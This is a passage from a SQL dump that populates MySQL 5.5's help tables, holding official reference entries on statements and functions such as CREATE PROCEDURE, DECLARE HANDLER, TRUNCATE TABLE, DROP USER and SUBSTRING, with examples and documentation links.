the\nstatement delimiter from ; to // while the procedure is being defined.\nThis enables the ; delimiter used in the procedure body to be passed\nthrough to the server rather than being interpreted by mysql itself.\nSee\nhttp://dev.mysql.com/doc/refman/5.5/en/stored-programs-defining.html.\n\nThe RETURNS clause may be specified only for a FUNCTION, for which it\nis mandatory. It indicates the return type of the function, and the\nfunction body must contain a RETURN value statement. If the RETURN\nstatement returns a value of a different type, the value is coerced to\nthe proper type. For example, if a function specifies an ENUM or SET\nvalue in the RETURNS clause, but the RETURN statement returns an\ninteger, the value returned from the function is the string for the\ncorresponding ENUM member of set of SET members.\n\nThe following example function takes a parameter, performs an operation\nusing an SQL function, and returns the result. In this case, it is\nunnecessary to use delimiter because the function definition contains\nno internal ; statement delimiters:\n\nmysql> CREATE FUNCTION hello (s CHAR(20))\nmysql> RETURNS CHAR(50) DETERMINISTIC\n -> RETURN CONCAT(\'Hello, \',s,\'!\');\nQuery OK, 0 rows affected (0.00 sec)\n\nmysql> SELECT hello(\'world\');\n+----------------+\n| hello(\'world\') |\n+----------------+\n| Hello, world! |\n+----------------+\n1 row in set (0.00 sec)\n\nParameter types and function return types can be declared to use any\nvalid data type, except that the COLLATE attribute cannot be used prior\nto MySQL 5.5.3. As of 5.5.3, COLLATE can be used if preceded by the\nCHARACTER SET attribute.\n\nThe routine_body consists of a valid SQL routine statement. This can be\na simple statement such as SELECT or INSERT, or a compound statement\nwritten using BEGIN and END. Compound statements can contain\ndeclarations, loops, and other control structure statements. The syntax\nfor these statements is described in\nhttp://dev.mysql.com/doc/refman/5.5/en/sql-syntax-compound-statements.h\ntml.\n\nMySQL permits routines to contain DDL statements, such as CREATE and\nDROP. MySQL also permits stored procedures (but not stored functions)\nto contain SQL transaction statements such as COMMIT. Stored functions\nmay not contain statements that perform explicit or implicit commit or\nrollback. Support for these statements is not required by the SQL\nstandard, which states that each DBMS vendor may decide whether to\npermit them.\n\nStatements that return a result set can be used within a stored\nprocedure but not within a stored function. This prohibition includes\nSELECT statements that do not have an INTO var_list clause and other\nstatements such as SHOW, EXPLAIN, and CHECK TABLE. For statements that\ncan be determined at function definition time to return a result set, a\nNot allowed to return a result set from a function error occurs\n(ER_SP_NO_RETSET). For statements that can be determined only at\nruntime to return a result set, a PROCEDURE %s can\'t return a result\nset in the given context error occurs (ER_SP_BADSELECT).\n\nUSE statements within stored routines are not permitted. When a routine\nis invoked, an implicit USE db_name is performed (and undone when the\nroutine terminates). The causes the routine to have the given default\ndatabase while it executes. References to objects in databases other\nthan the routine default database should be qualified with the\nappropriate database name.\n\nFor additional information about statements that are not permitted in\nstored routines, see\nhttp://dev.mysql.com/doc/refman/5.5/en/stored-program-restrictions.html\n.\n\nFor information about invoking stored procedures from within programs\nwritten in a language that has a MySQL interface, see [HELP CALL].\n\nMySQL stores the sql_mode system variable setting in effect when a\nroutine is created or altered, and always executes the routine with\nthis setting in force, regardless of the current server SQL mode when\nthe routine begins executing.\n\nThe switch from the SQL mode of the invoker to that of the routine\noccurs after evaluation of arguments and assignment of the resulting\nvalues to routine parameters. If you define a routine in strict SQL\nmode but invoke it in nonstrict mode, assignment of arguments to\nroutine parameters does not take place in strict mode. If you require\nthat expressions passed to a routine be assigned in strict SQL mode,\nyou should invoke the routine with strict mode in effect.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/create-procedure.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/create-procedure.html'),(304,'VARBINARY',23,'VARBINARY(M)\n\nThe VARBINARY type is similar to the VARCHAR type, but stores binary\nbyte strings rather than nonbinary character strings. M represents the\nmaximum column length in bytes.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/string-type-overview.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/string-type-overview.html'),(305,'LOAD INDEX',27,'Syntax:\nLOAD INDEX INTO CACHE\n tbl_index_list [, tbl_index_list] ...\n\ntbl_index_list:\n tbl_name\n [PARTITION (partition_list | ALL)]\n [[INDEX|KEY] (index_name[, index_name] ...)]\n [IGNORE LEAVES]\n\npartition_list:\n partition_name[, partition_name][, ...]\n\nThe LOAD INDEX INTO CACHE statement preloads a table index into the key\ncache to which it has been assigned by an explicit CACHE INDEX\nstatement, or into the default key cache otherwise.\n\nLOAD INDEX INTO CACHE is used only for MyISAM tables. In MySQL 5.5, it\nis also supported for partitioned MyISAM tables; in addition, indexes\non partitioned tables can be preloaded for one, several, or all\npartitions.\n\nThe IGNORE LEAVES modifier causes only blocks for the nonleaf nodes of\nthe index to be preloaded.\n\nIGNORE LEAVES is also supported for partitioned MyISAM tables.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/load-index.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/load-index.html'),(306,'UNION',28,'Syntax:\nSELECT ...\nUNION [ALL | DISTINCT] SELECT ...\n[UNION [ALL | DISTINCT] SELECT ...]\n\nUNION is used to combine the result from multiple SELECT statements\ninto a single result set.\n\nThe column names from the first SELECT statement are used as the column\nnames for the results returned. Selected columns listed in\ncorresponding positions of each SELECT statement should have the same\ndata type. (For example, the first column selected by the first\nstatement should have the same type as the first column selected by the\nother statements.)\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/union.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/union.html'),(307,'TO_DAYS',32,'Syntax:\nTO_DAYS(date)\n\nGiven a date date, returns a day number (the number of days since year\n0).\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html\n\n','mysql> SELECT TO_DAYS(950501);\n -> 728779\nmysql> SELECT TO_DAYS(\'2007-10-07\');\n -> 733321\n','http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html'),(308,'NOT REGEXP',38,'Syntax:\nexpr NOT REGEXP pat, expr NOT RLIKE pat\n\nThis is the same as NOT (expr REGEXP pat).\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/regexp.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/regexp.html'),(309,'SHOW INDEX',27,'Syntax:\nSHOW {INDEX | INDEXES | KEYS}\n {FROM | IN} tbl_name\n [{FROM | IN} db_name]\n [WHERE expr]\n\nSHOW INDEX returns table index information. The format resembles that\nof the SQLStatistics call in ODBC. This statement requires some\nprivilege for any column in the table.\nYou can use db_name.tbl_name as an alternative to the tbl_name FROM\ndb_name syntax. These two statements are equivalent:\n\nSHOW INDEX FROM mytable FROM mydb;\nSHOW INDEX FROM mydb.mytable;\n\nThe WHERE clause can be given to select rows using more general\nconditions, as discussed in\nhttp://dev.mysql.com/doc/refman/5.5/en/extended-show.html.\n\nYou can also list a table\'s indexes with the mysqlshow -k db_name\ntbl_name command.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/show-index.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/show-index.html'),(310,'SHOW CREATE DATABASE',27,'Syntax:\nSHOW CREATE {DATABASE | SCHEMA} [IF NOT EXISTS] db_name\n\nShows the CREATE DATABASE statement that creates the named database. If\nthe SHOW statement includes an IF NOT EXISTS clause, the output too\nincludes such a clause. SHOW CREATE SCHEMA is a synonym for SHOW CREATE\nDATABASE.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/show-create-database.html\n\n','mysql> SHOW CREATE DATABASE test\\G\n*************************** 1. row ***************************\n Database: test\nCreate Database: CREATE DATABASE `test`\n /*!40100 DEFAULT CHARACTER SET latin1 */\n\nmysql> SHOW CREATE SCHEMA test\\G\n*************************** 1. row ***************************\n Database: test\nCreate Database: CREATE DATABASE `test`\n /*!40100 DEFAULT CHARACTER SET latin1 */\n','http://dev.mysql.com/doc/refman/5.5/en/show-create-database.html'),(311,'LEAVE',24,'Syntax:\nLEAVE label\n\nThis statement is used to exit the flow control construct that has the\ngiven label. If the label is for the outermost stored program block,\nLEAVE exits the program.\n\nLEAVE can be used within BEGIN ... END or loop constructs (LOOP,\nREPEAT, WHILE).\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/leave.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/leave.html'),(312,'NOT IN',20,'Syntax:\nexpr NOT IN (value,...)\n\nThis is the same as NOT (expr IN (value,...)).\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/comparison-operators.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/comparison-operators.html'),(313,'!',15,'Syntax:\nNOT, !\n\nLogical NOT. Evaluates to 1 if the operand is 0, to 0 if the operand is\nnonzero, and NOT NULL returns NULL.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/logical-operators.html\n\n','mysql> SELECT NOT 10;\n -> 0\nmysql> SELECT NOT 0;\n -> 1\nmysql> SELECT NOT NULL;\n -> NULL\nmysql> SELECT ! (1+1);\n -> 0\nmysql> SELECT ! 1+1;\n -> 1\n','http://dev.mysql.com/doc/refman/5.5/en/logical-operators.html'),(314,'DECLARE HANDLER',24,'Syntax:\nDECLARE handler_action HANDLER\n FOR condition_value [, condition_value] ...\n statement\n\nhandler_action:\n CONTINUE\n | EXIT\n | UNDO\n\ncondition_value:\n mysql_error_code\n | SQLSTATE [VALUE] sqlstate_value\n | condition_name\n | SQLWARNING\n | NOT FOUND\n | SQLEXCEPTION\n\nThe DECLARE ... HANDLER statement specifies a handler that deals with\none or more conditions. If one of these conditions occurs, the\nspecified statement executes. statement can be a simple statement such\nas SET var_name = value, or a compound statement written using BEGIN\nand END (see [HELP BEGIN END]).\n\nHandler declarations must appear after variable or condition\ndeclarations.\n\nThe handler_action value indicates what action the handler takes after\nexecution of the handler statement:\n\no CONTINUE: Execution of the current program continues.\n\no EXIT: Execution terminates for the BEGIN ... END compound statement\n in which the handler is declared. This is true even if the condition\n occurs in an inner block.\n\no UNDO: Not supported.\n\nThe condition_value for DECLARE ... HANDLER indicates the specific\ncondition or class of conditions that activates the handler:\n\no A MySQL error code (a number) or an SQLSTATE value (a 5-character\n string literal). You should not use MySQL error code 0 or SQLSTATE\n values that begin with \'00\', because those indicate success rather\n than an error condition. For a list of MySQL error codes and SQLSTATE\n values, see\n http://dev.mysql.com/doc/refman/5.5/en/error-messages-server.html.\n\no A condition name previously specified with DECLARE ... CONDITION. A\n condition name can be associated with a MySQL error code or SQLSTATE\n value. See [HELP DECLARE CONDITION].\n\no SQLWARNING is shorthand for the class of SQLSTATE values that begin\n with \'01\'.\n\no NOT FOUND is shorthand for the class of SQLSTATE values that begin\n with \'02\'. This is relevant within the context of cursors and is used\n to control what happens when a cursor reaches the end of a data set.\n If no more rows are available, a No Data condition occurs with\n SQLSTATE value \'02000\'. To detect this condition, you can set up a\n handler for it (or for a NOT FOUND condition). For an example, see\n http://dev.mysql.com/doc/refman/5.5/en/cursors.html. This condition\n also occurs for SELECT ... INTO var_list statements that retrieve no\n rows.\n\no SQLEXCEPTION is shorthand for the class of SQLSTATE values that do\n not begin with \'00\', \'01\', or \'02\'.\n\nIf a condition occurs for which no handler has been declared, the\naction taken depends on the condition class:\n\no For SQLEXCEPTION conditions, the stored program terminates at the\n statement that raised the condition, as if there were an EXIT\n handler. If the program was called by another stored program, the\n calling program handles the condition using the handler selection\n rules applied to its own handlers.\n\no For SQLWARNING conditions, the program continues executing, as if\n there were a CONTINUE handler.\n\no For NOT FOUND conditions, if the condition was raised normally, the\n action is CONTINUE. If it was raised by SIGNAL or RESIGNAL, the\n action is EXIT.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/declare-handler.html\n\n','mysql> CREATE TABLE test.t (s1 INT, PRIMARY KEY (s1));\nQuery OK, 0 rows affected (0.00 sec)\n\nmysql> delimiter //\n\nmysql> CREATE PROCEDURE handlerdemo ()\n -> BEGIN\n -> DECLARE CONTINUE HANDLER FOR SQLSTATE \'23000\' SET @x2 = 1;\n -> SET @x = 1;\n -> INSERT INTO test.t VALUES (1);\n -> SET @x = 2;\n -> INSERT INTO test.t VALUES (1);\n -> SET @x = 3;\n -> END;\n -> //\nQuery OK, 0 rows affected (0.00 sec)\n\nmysql> CALL handlerdemo()//\nQuery OK, 0 rows affected, 1 warning (0.01 sec)\n\nmysql> SHOW WARNINGS//\n+-------+------+---------------------------------------+\n| Level | Code | Message |\n+-------+------+---------------------------------------+\n| Error | 1062 | Duplicate entry \'1\' for key \'PRIMARY\' |\n+-------+------+---------------------------------------+\n1 row in set (0.00 sec)\n\n\nmysql> SELECT @x//\n +------+\n | @x |\n +------+\n | 3 |\n +------+\n 1 row in set (0.00 sec)\n','http://dev.mysql.com/doc/refman/5.5/en/declare-handler.html'),(315,'DOUBLE',23,'DOUBLE[(M,D)] [UNSIGNED] [ZEROFILL]\n\nA normal-size (double-precision) floating-point number. Permissible\nvalues are -1.7976931348623157E+308 to -2.2250738585072014E-308, 0, and\n2.2250738585072014E-308 to 1.7976931348623157E+308. These are the\ntheoretical limits, based on the IEEE standard. The actual range might\nbe slightly smaller depending on your hardware or operating system.\n\nM is the total number of digits and D is the number of digits following\nthe decimal point. If M and D are omitted, values are stored to the\nlimits permitted by the hardware. A double-precision floating-point\nnumber is accurate to approximately 15 decimal places.\n\nUNSIGNED, if specified, disallows negative values.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/numeric-type-overview.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/numeric-type-overview.html'),(316,'TIME',23,'TIME\n\nA time. The range is \'-838:59:59\' to \'838:59:59\'. MySQL displays TIME\nvalues in \'HH:MM:SS\' format, but permits assignment of values to TIME\ncolumns using either strings or numbers.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/date-and-time-type-overview.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/date-and-time-type-overview.html'),(317,'X',11,'X(p)\n\nReturns the X-coordinate value for the Point object p as a\ndouble-precision number.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/gis-point-property-functions.html\n\n','mysql> SELECT X(POINT(56.7, 53.34));\n+-----------------------+\n| X(POINT(56.7, 53.34)) |\n+-----------------------+\n| 56.7 |\n+-----------------------+\n','http://dev.mysql.com/doc/refman/5.5/en/gis-point-property-functions.html'),(318,'SYSTEM_USER',17,'Syntax:\nSYSTEM_USER()\n\nSYSTEM_USER() is a synonym for USER().\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/information-functions.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/information-functions.html'),(319,'FOUND_ROWS',17,'Syntax:\nFOUND_ROWS()\n\nA SELECT statement may include a LIMIT clause to restrict the number of\nrows the server returns to the client. In some cases, it is desirable\nto know how many rows the statement would have returned without the\nLIMIT, but without running the statement again. To obtain this row\ncount, include a SQL_CALC_FOUND_ROWS option in the SELECT statement,\nand then invoke FOUND_ROWS() afterward:\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/information-functions.html\n\n','mysql> SELECT SQL_CALC_FOUND_ROWS * FROM tbl_name\n -> WHERE id > 100 LIMIT 10;\nmysql> SELECT FOUND_ROWS();\n','http://dev.mysql.com/doc/refman/5.5/en/information-functions.html'),(320,'CROSSES',31,'Crosses(g1,g2)\n\nReturns 1 if g1 spatially crosses g2. Returns NULL if g1 is a Polygon\nor a MultiPolygon, or if g2 is a Point or a MultiPoint. Otherwise,\nreturns 0.\n\nThe term spatially crosses denotes a spatial relation between two given\ngeometries that has the following properties:\n\no The two geometries intersect\n\no Their intersection results in a geometry that has a dimension that is\n one less than the maximum dimension of the two given geometries\n\no Their intersection is not equal to either of the two given geometries\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/spatial-relation-functions-object-shapes.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/spatial-relation-functions-object-shapes.html'),(321,'TRUNCATE TABLE',40,'Syntax:\nTRUNCATE [TABLE] tbl_name\n\nTRUNCATE TABLE empties a table completely. It requires the DROP\nprivilege.\n\nLogically, TRUNCATE TABLE is similar to a DELETE statement that deletes\nall rows, or a sequence of DROP TABLE and CREATE TABLE statements. To\nachieve high performance, it bypasses the DML method of deleting data.\nThus, it cannot be rolled back, it does not cause ON DELETE triggers to\nfire, and it cannot be performed for InnoDB tables with parent-child\nforeign key relationships.\n\nAlthough TRUNCATE TABLE is similar to DELETE, it is classified as a DDL\nstatement rather than a DML statement. It differs from DELETE in the\nfollowing ways in MySQL 5.5:\n\no Truncate operations drop and re-create the table, which is much\n faster than deleting rows one by one, particularly for large tables.\n\no Truncate operations cause an implicit commit, and so cannot be rolled\n back.\n\no Truncation operations cannot be performed if the session holds an\n active table lock.\n\no TRUNCATE TABLE fails for an InnoDB table if there are any FOREIGN KEY\n constraints from other tables that reference the table. Foreign key\n constraints between columns of the same table are permitted.\n\no Truncation operations do not return a meaningful value for the number\n of deleted rows. The usual result is \"0 rows affected,\" which should\n be interpreted as \"no information.\"\n\no As long as the table format file tbl_name.frm is valid, the table can\n be re-created as an empty table with TRUNCATE TABLE, even if the data\n or index files have become corrupted.\n\no Any AUTO_INCREMENT value is reset to its start value. This is true\n even for MyISAM and InnoDB, which normally do not reuse sequence\n values.\n\no When used with partitioned tables, TRUNCATE TABLE preserves the\n partitioning; that is, the data and index files are dropped and\n re-created, while the partition definitions (.par) file is\n unaffected.\n\no The TRUNCATE TABLE statement does not invoke ON DELETE triggers.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/truncate-table.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/truncate-table.html'),(322,'BIT_XOR',16,'Syntax:\nBIT_XOR(expr)\n\nReturns the bitwise XOR of all bits in expr. The calculation is\nperformed with 64-bit (BIGINT) precision.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/group-by-functions.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/group-by-functions.html'),(323,'CURRENT_DATE',32,'Syntax:\nCURRENT_DATE, CURRENT_DATE()\n\nCURRENT_DATE and CURRENT_DATE() are synonyms for CURDATE().\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html'),(324,'START SLAVE',8,'Syntax:\nSTART SLAVE [thread_types]\n\nSTART SLAVE [SQL_THREAD] UNTIL\n MASTER_LOG_FILE = \'log_name\', MASTER_LOG_POS = log_pos\n\nSTART SLAVE [SQL_THREAD] UNTIL\n RELAY_LOG_FILE = \'log_name\', RELAY_LOG_POS = log_pos\n\nthread_types:\n [thread_type [, thread_type] ... ]\n\nthread_type: IO_THREAD | SQL_THREAD\n\nSTART SLAVE with no thread_type options starts both of the slave\nthreads. The I/O thread reads events from the master server and stores\nthem in the relay log. The SQL thread reads events from the relay log\nand executes them. START SLAVE requires the SUPER privilege.\n\nIf START SLAVE succeeds in starting the slave threads, it returns\nwithout any error. However, even in that case, it might be that the\nslave threads start and then later stop (for example, because they do\nnot manage to connect to the master or read its binary log, or some\nother problem). START SLAVE does not warn you about this. You must\ncheck the slave\'s error log for error messages generated by the slave\nthreads, or check that they are running satisfactorily with SHOW SLAVE\nSTATUS.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/start-slave.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/start-slave.html'),(325,'AREA',2,'Area(poly)\n\nReturns a double-precision number indicating the area of the argument,\nas measured in its spatial reference system. For arguments of dimension\n0 or 1, the result is 0.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/gis-polygon-property-functions.html\n\n','mysql> SET @poly = \'Polygon((0 0,0 3,3 0,0 0),(1 1,1 2,2 1,1 1))\';\nmysql> SELECT Area(GeomFromText(@poly));\n+---------------------------+\n| Area(GeomFromText(@poly)) |\n+---------------------------+\n| 4 |\n+---------------------------+\n\nmysql> SET @mpoly =\n -> \'MultiPolygon(((0 0,0 3,3 3,3 0,0 0),(1 1,1 2,2 2,2 1,1 1)))\';\nmysql> SELECT Area(GeomFromText(@mpoly));\n+----------------------------+\n| Area(GeomFromText(@mpoly)) |\n+----------------------------+\n| 8 |\n+----------------------------+\n','http://dev.mysql.com/doc/refman/5.5/en/gis-polygon-property-functions.html'),(326,'FLUSH',27,'Syntax:\nFLUSH [NO_WRITE_TO_BINLOG | LOCAL]\n flush_option [, flush_option] ...\n\nThe FLUSH statement has several variant forms that clear or reload\nvarious internal caches, flush tables, or acquire locks. To execute\nFLUSH, you must have the RELOAD privilege. Specific flush options might\nrequire additional privileges, as described later.\n\nBy default, the server writes FLUSH statements to the binary log so\nthat they replicate to replication slaves. To suppress logging, specify\nthe optional NO_WRITE_TO_BINLOG keyword or its alias LOCAL.\n\n*Note*: FLUSH LOGS, FLUSH MASTER, FLUSH SLAVE, and FLUSH TABLES WITH\nREAD LOCK (with or without a table list) are not written to the binary\nlog in any case because they would cause problems if replicated to a\nslave.\n\nSending a SIGHUP signal to the server causes several flush operations\nto occur that are similar to various forms of the FLUSH statement. See\nhttp://dev.mysql.com/doc/refman/5.5/en/server-signal-response.html.\n\nThe FLUSH statement causes an implicit commit. See\nhttp://dev.mysql.com/doc/refman/5.5/en/implicit-commit.html.\n\nThe RESET statement is similar to FLUSH. See [HELP RESET], for\ninformation about using the RESET statement with replication.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/flush.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/flush.html'),(327,'BEGIN END',24,'Syntax:\n[begin_label:] BEGIN\n [statement_list]\nEND [end_label]\n\nBEGIN ... END syntax is used for writing compound statements, which can\nappear within stored programs (stored procedures and functions,\ntriggers, and events). A compound statement can contain multiple\nstatements, enclosed by the BEGIN and END keywords. statement_list\nrepresents a list of one or more statements, each terminated by a\nsemicolon (;) statement delimiter. The statement_list itself is\noptional, so the empty compound statement (BEGIN END) is legal.\n\nBEGIN ... END blocks can be nested.\n\nUse of multiple statements requires that a client is able to send\nstatement strings containing the ; statement delimiter. In the mysql\ncommand-line client, this is handled with the delimiter command.\nChanging the ; end-of-statement delimiter (for example, to //) permit ;\nto be used in a program body. For an example, see\nhttp://dev.mysql.com/doc/refman/5.5/en/stored-programs-defining.html.\n\nA BEGIN ... END block can be labeled. See [HELP labels].\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/begin-end.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/begin-end.html'),(328,'SHOW PROCEDURE STATUS',27,'Syntax:\nSHOW PROCEDURE STATUS\n [LIKE \'pattern\' | WHERE expr]\n\nThis statement is a MySQL extension. It returns characteristics of a\nstored procedure, such as the database, name, type, creator, creation\nand modification dates, and character set information. A similar\nstatement, SHOW FUNCTION STATUS, displays information about stored\nfunctions (see [HELP SHOW FUNCTION STATUS]).\n\nThe LIKE clause, if present, indicates which procedure or function\nnames to match. The WHERE clause can be given to select rows using more\ngeneral conditions, as discussed in\nhttp://dev.mysql.com/doc/refman/5.5/en/extended-show.html.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/show-procedure-status.html\n\n','mysql> SHOW PROCEDURE STATUS LIKE \'sp1\'\\G\n*************************** 1. row ***************************\n Db: test\n Name: sp1\n Type: PROCEDURE\n Definer: testuser@localhost\n Modified: 2004-08-03 15:29:37\n Created: 2004-08-03 15:29:37\n Security_type: DEFINER\n Comment:\ncharacter_set_client: latin1\ncollation_connection: latin1_swedish_ci\n Database Collation: latin1_swedish_ci\n','http://dev.mysql.com/doc/refman/5.5/en/show-procedure-status.html'),(329,'SHOW WARNINGS',27,'Syntax:\nSHOW WARNINGS [LIMIT [offset,] row_count]\nSHOW COUNT(*) WARNINGS\n\nSHOW WARNINGS is a diagnostic statement that displays information about\nthe conditions (errors, warnings, and notes) resulting from executing a\nstatement in the current session. Warnings are generated for DML\nstatements such as INSERT, UPDATE, and LOAD DATA INFILE as well as DDL\nstatements such as CREATE TABLE and ALTER TABLE.\n\nThe LIMIT clause has the same syntax as for the SELECT statement. See\nhttp://dev.mysql.com/doc/refman/5.5/en/select.html.\n\nSHOW WARNINGS is also used following EXPLAIN EXTENDED, to display the\nextra information generated by EXPLAIN when the EXTENDED keyword is\nused. See http://dev.mysql.com/doc/refman/5.5/en/explain-extended.html.\n\nSHOW WARNINGS displays information about the conditions resulting from\nthe most recent statement in the current session that generated\nmessages. It shows nothing if the most recent statement used a table\nand generated no messages. (That is, statements that use a table but\ngenerate no messages clear the message list.) Statements that do not\nuse tables and do not generate messages have no effect on the message\nlist.\n\nThe SHOW COUNT(*) WARNINGS diagnostic statement displays the total\nnumber of errors, warnings, and notes. You can also retrieve this\nnumber from the warning_count system variable:\n\nSHOW COUNT(*) WARNINGS;\nSELECT @@warning_count;\n\nA related diagnostic statement, SHOW ERRORS, shows only error\nconditions (it excludes warnings and notes), and SHOW COUNT(*) ERRORS\nstatement displays the total number of errors. See [HELP SHOW ERRORS].\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/show-warnings.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/show-warnings.html'),(330,'DROP USER',10,'Syntax:\nDROP USER user [, user] ...\n\nThe DROP USER statement removes one or more MySQL accounts and their\nprivileges. It removes privilege rows for the account from all grant\ntables. An error occurs for accounts that do not exist.\n\nTo use DROP USER, you must have the global CREATE USER privilege or the\nDELETE privilege for the mysql database. When the read_only system\nvariable is enabled, DROP USER additionally requires the SUPER\nprivilege.\n\nEach account name uses the format described in\nhttp://dev.mysql.com/doc/refman/5.5/en/account-names.html. For example:\n\nDROP USER \'jeffrey\'@\'localhost\';\n\nIf you specify only the user name part of the account name, a host name\npart of \'%\' is used.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/drop-user.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/drop-user.html'),(331,'STDDEV_POP',16,'Syntax:\nSTDDEV_POP(expr)\n\nReturns the population standard deviation of expr (the square root of\nVAR_POP()). You can also use STD() or STDDEV(), which are equivalent\nbut not standard SQL.\n\nSTDDEV_POP() returns NULL if there were no matching rows.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/group-by-functions.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/group-by-functions.html'),(332,'SHOW CHARACTER SET',27,'Syntax:\nSHOW CHARACTER SET\n [LIKE \'pattern\' | WHERE expr]\n\nThe SHOW CHARACTER SET statement shows all available character sets.\nThe LIKE clause, if present, indicates which character set names to\nmatch. The WHERE clause can be given to select rows using more general\nconditions, as discussed in\nhttp://dev.mysql.com/doc/refman/5.5/en/extended-show.html. For example:\n\nmysql> SHOW CHARACTER SET LIKE \'latin%\';\n+---------+-----------------------------+-------------------+--------+\n| Charset | Description | Default collation | Maxlen |\n+---------+-----------------------------+-------------------+--------+\n| latin1 | cp1252 West European | latin1_swedish_ci | 1 |\n| latin2 | ISO 8859-2 Central European | latin2_general_ci | 1 |\n| latin5 | ISO 8859-9 Turkish | latin5_turkish_ci | 1 |\n| latin7 | ISO 8859-13 Baltic | latin7_general_ci | 1 |\n+---------+-----------------------------+-------------------+--------+\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/show-character-set.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/show-character-set.html'),(333,'SUBSTRING',38,'Syntax:\nSUBSTRING(str,pos), SUBSTRING(str FROM pos), SUBSTRING(str,pos,len),\nSUBSTRING(str FROM pos FOR len)\n\nThe forms without a len argument return a substring from string str\nstarting at position pos. The forms with a len argument return a\nsubstring len characters long from string str, starting at position\npos. The forms that use FROM are standard SQL syntax. It is also\npossible to use a negative value for pos. In this case, the beginning\nof the substring is pos characters from the end of the string, rather\nthan the beginning. A negative value may be used for pos in any of the\nforms of this function.\n\nFor all forms of SUBSTRING(), the position of the first character in\nthe string from which the substring is to be extracted is reckoned as\n1.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/string-functions.html\n\n','mysql> SELECT SUBSTRING(\'Quadratically\',5);\n -> \'ratically\'\nmysql> SELECT SUBSTRING(\'foobarbar\' FROM 4);\n -> \'barbar\'\nmysql> SELECT SUBSTRING(\'Quadratically\',5,6);\n -> \'ratica\'\nmysql> SELECT SUBSTRING(\'Sakila\', -3);\n -> \'ila\'\nmysql> SELECT SUBSTRING(\'Sakila\', -5, 3);\n -> \'aki\'\nmysql> SELECT SUBSTRING(\'Sakila\' FROM -4 FOR 2);\n -> \'ki\'\n','http://dev.mysql.com/doc/refman/5.5/en/string-functions.html'),(334,'ISEMPTY',37,'IsEmpty(g)\n\nThis function is a placeholder that returns 0 for any valid geometry\nvalue, 1 for any invalid geometry value or NULL.\n\nMySQL does not support GIS EMPTY values such as POINT EMPTY.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/gis-general-property-functions.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/gis-general-property-functions.html'),(335,'SHOW FUNCTION STATUS',27,'Syntax:\nSHOW FUNCTION STATUS\n [LIKE \'pattern\' | WHERE expr]\n\nThis statement is similar to SHOW PROCEDURE STATUS but for stored\nfunctions. See [HELP SHOW PROCEDURE STATUS].\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/show-function-status.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/show-function-status.html'),(336,'LTRIM',38,'Syntax:\nLTRIM(str)\n\nReturns the string str with leading space characters removed.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/string-functions.html\n\n','mysql> SELECT LTRIM(\' barbar\');\n -> \'barbar\'\n','http://dev.mysql.com/doc/refman/5.5/en/string-functions.html'),(337,'INTERSECTS',31,'Intersects(g1,g2)\n\nReturns 1 or 0 to indicate whether g1 spatially intersects g2.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/spatial-relation-functions-mbr.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/spatial-relation-functions-mbr.html'),(338,'CALL',28,'Syntax:\nCALL sp_name([parameter[,...]])\nCALL sp_name[()]\n\nThe CALL statement invokes a stored procedure that was defined\npreviously with CREATE PROCEDURE.\n\nStored procedures that take no arguments can be invoked without\nparentheses. That is, CALL p() and CALL p are equivalent.\n\nCALL can pass back values to its caller using parameters that are\ndeclared as OUT or INOUT parameters. When the procedure 